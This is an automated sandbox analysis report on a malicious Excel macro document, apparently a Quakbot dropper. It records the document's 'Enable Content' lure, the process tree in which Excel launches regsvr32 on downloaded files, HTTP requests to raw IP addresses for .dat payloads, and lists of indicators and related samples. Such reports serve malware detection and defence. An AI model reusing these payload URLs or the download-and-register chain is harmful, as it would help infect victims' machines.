Loading ...

Play interactive tourEdit tour

Windows Analysis Report Permission-1984690372-06252021.xlsm

Overview

General Information

Sample Name:Permission-1984690372-06252021.xlsm
Analysis ID:440652
MD5:f9272d851155983c3326ae7bcd99e489
SHA1:caaa6700907da09efc9d7831ec9a0dc636bdbe74
SHA256:80a312be7e3162e80ef38492e7c2160af88e1482fb80ea3370761a0c0654478d
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2624 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2180 cmdline: regsvr32 ..\Kro.fis MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2176 cmdline: regsvr32 ..\Kro.fis1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2364 cmdline: regsvr32 ..\Kro.fis2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2624, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 2180

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 190.14.37.3:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.240.103.219:80
Source: global trafficHTTP traffic detected: GET /44372.7698814815.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.7698814815.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\94954BDE.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /44372.7698814815.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /44372.7698814815.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2146358478.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126668490.0000000001CB0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 19 ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from th
Source: Screenshot number: 4Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A . A m EC
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the ' yellow bar above. 21 22 G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 8Screenshot OCR: Enable Content 30 31 32 33 ) CI O 34 35 36 37 38 , Id 1 p pi Sheetl tj i q |"1 P A _ Savi
Source: Document image extraction number: 0Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0Screenshot OCR: Enable Content
Source: Document image extraction number: 1Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Permission-1984690372-06252021.xlsmInitial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Permission-1984690372-06252021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC3AC.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fisJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Permission-1984690372-06252021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-1984690372-06252021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-1984690372-06252021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2028Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2340Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2320Thread sleep time: -60000s >= -30000sJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Permission-1984690372-06252021.xlsm4%ReversingLabsDocument-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://190.14.37.3/44372.7698814815.dat0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
http://185.183.99.120/44372.7698814815.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://190.14.37.3/44372.7698814815.datfalse
  • Avira URL Cloud: safe
unknown
http://185.183.99.120/44372.7698814815.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comregsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/regsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpfalse
              high
              http://www.%s.comPAregsvr32.exe, 00000003.00000002.2147014910.00000000039B0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127432523.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108315823.0000000003BA0000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              low
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2149320553.0000000004AE7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130188741.0000000004A67000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.2148309854.0000000004900000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2129242962.0000000004880000.00000002.00000001.sdmpfalse
                high
                http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2146358478.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126668490.0000000001CB0000.00000002.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                190.14.37.3
                unknownPanama
                52469OffshoreRacksSAPAfalse
                185.183.99.120
                unknownNetherlands
                60117HSAEfalse
                185.240.103.219
                unknownRussian Federation
                57724DDOS-GUARDRUfalse

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:440652
                Start date:25.06.2021
                Start time:18:27:56
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 57s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Permission-1984690372-06252021.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal64.expl.evad.winXLSM@7/7@0/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/440652/sample/Permission-1984690372-06252021.xlsm

                Simulations

                Behavior and APIs

                TimeTypeDescription
                18:28:50API Interceptor3x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                190.14.37.3Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.7671056713.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.5879460648.dat
                185.183.99.120Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.7671056713.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.5879460648.dat
                185.240.103.219Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219/44372.5879460648.dat

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                DDOS-GUARDRUPermission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                ForceNitro.exeGet hashmaliciousBrowse
                • 185.178.208.135
                PO#8076.exeGet hashmaliciousBrowse
                • 185.129.100.112
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                jebDtHCePK9feGL.exeGet hashmaliciousBrowse
                • 185.129.100.112
                EDS03932,pdf.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                12042021493876783,xlsx.exeGet hashmaliciousBrowse
                • 185.178.208.160
                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                • 5.253.61.31
                AxR7BY4wzz.exeGet hashmaliciousBrowse
                • 185.178.208.189
                SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                • 185.178.208.189
                #U041e#U0442#U043a#U0440#U044b#U0442#U044c www.sberbank.ru-0152 .htmGet hashmaliciousBrowse
                • 185.129.100.100
                Install.exeGet hashmaliciousBrowse
                • 185.219.40.40
                CHEAT.exeGet hashmaliciousBrowse
                • 185.178.208.161
                OffshoreRacksSAPAPermission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                banUwVSwBY.xlsxGet hashmaliciousBrowse
                • 190.14.37.134
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 190.14.37.121
                DEBT_06032021_861309073.xlsmGet hashmaliciousBrowse
                • 190.14.37.121
                Rebate_854427061_05272021.xlsmGet hashmaliciousBrowse
                • 190.14.37.102
